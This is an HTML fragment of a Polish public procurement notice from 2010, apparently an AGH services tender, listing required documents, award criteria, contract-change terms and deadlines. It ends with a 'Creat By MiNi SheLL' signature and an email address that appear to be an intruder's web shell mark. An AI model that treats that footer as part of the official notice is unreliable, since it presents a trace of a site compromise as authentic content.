<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - usługi
Kosztorys cenowy
Wykaz podwykonawców jeżeli Wykonawca przewiduje ich udział</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Cena (stawka) roboczogodziny brutto - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszystkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności z zastrzeżeniem przepisów Ustawy Prawo Zamówień Publicznych, w szczególności art. 144.
2. Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust 3 ustawy Prawo zamówień publicznych stanowiącego, że umowa jest nieważna w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ.  
4. Dopuszcza się możliwość zmiany ustaleń niniejszej umowy w stosunku do treści oferty Zleceniobiorcy w następującym zakresie: 
a.	wysokości wynagrodzenia w przypadku:
-	zmiany stawki podatku VAT, w odniesieniu do tej części wynagrodzenia, której zmiana dotyczy,
b. zmiany osób odpowiedzialnych za realizację przedmiotu zamówienia. Osoby te muszą posiadać kwalifikacje i uprawnienia wymagane w SIWZ.

5. Warunkiem dokonania zmian, o których mowa w ust. 4 jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, obliczenie kosztów zmian, jeżeli zmiana będzie miała wpływ na wynagrodzenie wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.agh.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego pok. 117, paw. C-2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2010 godzina 09:30, miejsce: siedziba zamawiającego pok. 117, paw. C-2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com